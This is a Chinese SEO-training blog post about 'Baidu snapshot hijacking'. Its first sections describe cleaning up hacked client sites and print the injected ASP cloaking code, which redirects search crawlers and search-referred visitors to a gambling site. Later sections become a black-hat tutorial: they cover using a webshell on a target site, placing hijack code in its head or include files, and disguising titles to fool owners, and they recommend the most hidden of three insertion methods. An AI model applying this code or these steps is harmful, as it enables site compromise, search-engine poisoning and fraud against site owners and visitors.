您当前的位置:首页 > 百度seo > 百度seo优化

百度快照劫持

2018-01-03 21:21:42 来源: seofuwu 作者: 满山红seo培训
  
  
摘要: 百度快照劫持可能有些朋友还不清楚“百度快照劫持”到底是什么意思?那么我就先给大家解释一下:百度快照劫持也就是搜索引擎抓取的是正常网站的快照,但通过搜索关键

 百度快照劫持


可能有些朋友还不清楚“百度快照劫持”到底是什么意思?那么我就先给大家解释一下:百度快照劫持也就是搜索引擎抓取的是正常网站的快照,但通过搜索关键词点击进入网站之后展现的确实另外一种内容,说白了也就是人所看到的网站和搜索引擎看到的网站是不一样的。

百度快照劫持

最近,我的一位客户找到我紧急求救说自己的网站被黑客攻击了,网站打开之后内容已被篡改显示的是博彩的信息。通过在地址栏直接输入域名打开是没问题的。但当通过百度搜索关键词“红祥建材”发现果真如他所说的那样,进入之后全部都是博彩的广告。

起先,在搜索返回结果中,显示的还是原本的标题和描述:

百度快照劫持

从搜索结果来看还是比较正常的,但当点进去之后才发现网站域名已经跳转到挂满博彩广告的网站上:

百度快照劫持

这就是最典型的网站百度劫持案例了。其实呢,遇到网站被人百度快照劫持也不要太慌张了,这个问题解决起来真的并没有那么复杂。下面就来说说我是怎么解决的吧。

网站一旦遇到快照劫持,首先第一反应就是系统检查网站代码,一旦发现可疑的代码就立即诊断检测当机立断。我通过查看源代码发现,网站出现了这样一大段很不寻常的代码:

百度快照劫持

经仔细分析确认这段代码就是被黑客加上去的,于是我迅速将其删掉,这样以来网站就恢复了正常,在这里要提醒大家的是我们在清除这些垃圾代码后,要清除浏览器的历史记录或者Ctrl+F5强制刷新浏览器之后才能看到效果。之所以要作为专门强调提醒是因为我吃过亏,至于具体是什么亏你可以自己去想象:我检查了一遍又一遍没有发现问题,到头来才恍然大悟原来是浏览器缓存的缘故。

至于我们如何快速找到黑客植入攻击代码的文件,告诉大家一个简单的方法,就是查看网站文件的修改时间,一些最近最新的修改时间的文件而且你自己又没有动过的,那么你就在这儿寻找,可以将这个别的几个文件单独下载下来然后用编辑器全局搜索,这样我们就很容易找到具体的被植入代码的文件了。

百度快照劫持

另外,网站根目录如果有一些可疑的文件,而且能确定不是你自己主动添加的,那么这些文件你就一定要好好排查一下了。再者咱们的网站后台登录密码以及服务器的密码最好都设置难度高一点的,免得被人轻易攻破。

目前网站的百度快照劫持虽然解决了,但由于发现时间太晚,百度在我检查解决问题的同时也更新了快照,当然这也只能算作是百度的快照缓存,于是便出现了下面如图所示的情况:

百度快照劫持

网站的本身在问题解决之后通过百度搜索关键词点进去是没有问题的,网站已经恢复了正常,剩下的也就是百度快照恢复过来就行了。这个问题我也已经做了百度快照投诉,相信在不久之后网站就可以全面复原。

所以为了避免这一问题的出现我们最好能对自己的网站关心点,引以为戒。做好网站安全方面的防护,同时也希望广大站长朋友不要恶意去攻击他人的网站,因为大家都不容易!

二,百度快照是如何被黑客篡改的

写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

百度快照劫持

前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家彩票平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)

百度快照劫持

查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

百度快照劫持

1、黑客是如何修改百度快照的呢?

我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:

百度快照劫持

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目标网站)window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

2、那么黑客是如何进入后台的呢?

黑客要进入后台,必须知道FTP账户和密码,以及IP地址。

造成的原因有如下几种:

1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,

2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。

3、网站被黑之后,你如何追查黑客的来源?

方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。

如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。

通过中国万网Whois域名查询:比如我客户跳转的彩票网站的域名信息如下:

百度快照劫持

1)第一个是:注册人

2)第二个是:联系电话

3)第三个是:联系邮箱

基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:

违法和不良信息举报中心:http://net.china.cn/

12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/

国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/

中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/

公安部信息网络安全报警网站:http://www.cyberpolice.cn/wfjb/

中国扫黄打非网:http://www.shdf.gov.cn/

北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp

三,seo黑帽之百度快照劫持技术分享 

昨天晚上看了一个seo黑帽劫持百度快照的视频教程,决定分享出来,不是倡导大家如何去用黑帽的手法来作弊,只是教给大家如果自己的网站快照被劫持了应该怎么解决,好了废话不多说了,小猫咪直接上干货!

seo黑帽劫持百度快照分为三种,分别是静态页html,动态asp和php。其实原理都差不多,只要找到他们相应的首页文件index.html,index.asp,index.php就可以进行投放我们的百度快照劫持代码了。

seo黑帽百度快照劫持具体操作方法:

1、找到劫持目标网站

2、进入劫持站的webshell,就是可控制该网站的后台。

3、进入后台找到首页文件编辑把我们的劫持代码放到首页文件内部的<head>和</head>标签之间即可。

百度劫持代码要修改的地方:

asp和php劫持代码需要修改的地方一个是百度抓取到你网站快照的网址,另一个是要跳转到你网站的网址,这两个都是你的网址。静态html:劫持代码有一段标题需要你设置被劫持网站的标题,目的是为了给网站所有者看的迷惑对方,只需要把他网站本身的标题,关键词,描述修改为你自己的网站信息,快照就会变成你自己的了。

百度快照劫持的方法就是这么简单,今天就是简单的讲了下百度快照劫持的操作手法,当你的网站被劫持快照了应该知道怎么去解决了吧,只要找到首页文件把<head>和</head>之间的劫持代码删掉即可,等待百度快照下次更新即可变为你网站本身的快照。

四,劫持百度快照的三种代码添加方法

快照劫持是通过代码来判断和识别蜘蛛访问的程序,如果是正常访问,则给出正常内容,而如果判断到是搜素引擎来访问,就给出另一个页面,使其在搜素引擎中的快照进行改变,之后判断来路跳转,如果是搜素引擎打开就跳转到我们指定的网站,如果正常访问,就不做变化,显示正常的内容。劫持在这里就不多说了,我们来看下添加劫持代码的三种方法。

第一种:放在Head下进行劫持快照

直接将代码放到首页的Head标签下即可进行劫持,非常的方便。

第二种:放到已有的Include文件里面进行劫持快照

Include是包括的意思,也就是说Include是首页文件引用的另一个文件,我们把代码加到这个Include文件中,同样能实现劫持效果,而此时劫持代码并不在首页,而是放到了Include文件中。

第三种:创建一个新的Include文件进行劫持快照

创建一个文件,然后把劫持代码放到这个文件中,之后,我们需要引用这个文件,需要在首页插入一句Include文件引用代码,即可实现劫持。这个方法和第二个是一样的,区别在于第二个直接加在已有的文件上,而这个需要创建文件还要添加引用代码,并第二种做法多了两个步骤。

在选择上,这三种方法中,第一种是最直接和方便的,直接加到主页文件里面就行。第二种和第三种相对隐蔽些,第二种只需在已有的Include文件中加上劫持代码即可,也非常的方便,并且隐蔽。第三种方法同样很隐蔽,但多了两个步骤,一个是需要创建一个Include文件,还有就是要添加一行引用Include文件的代码。综合下来,推荐使用第二种方法,第二种方法比第一种隐蔽,比第三种方便。

本文由满山红SEO培训编辑收集于网络不代表本站观点,如果您还想了解更多关于网站seo优化与SEO培训视频教程的文章,请点击查看seo培训seo顾问服务的其它文章,请关注满山红seo快速排名优化平台(www.seofuwu.com).

上一篇:返回列表
下一篇:【SEO培训公司】百度的基因是什么?是技术
热门推荐
SEO顾问
黑帽seo
晋江网站建设
桂林seo:合格的SEOer,应具备哪些能力
SEO培训学习方式是否正确,决定SEO技术水平高低
乐陵seo:观百度需求,思SEO优化方向
seo技术培训教程:Google搜索引擎中的安全漏洞 通过开放重定向窃取其他站点的权重
百度seo排名培训:企业产品网站三个月关键词排名上百度首页排名策略
seo实战培训王乃用:内容营销来提升长尾词SEO优化排名技巧
速贝seo实战培训:搜索引擎算法不断升级 未来seo该怎么做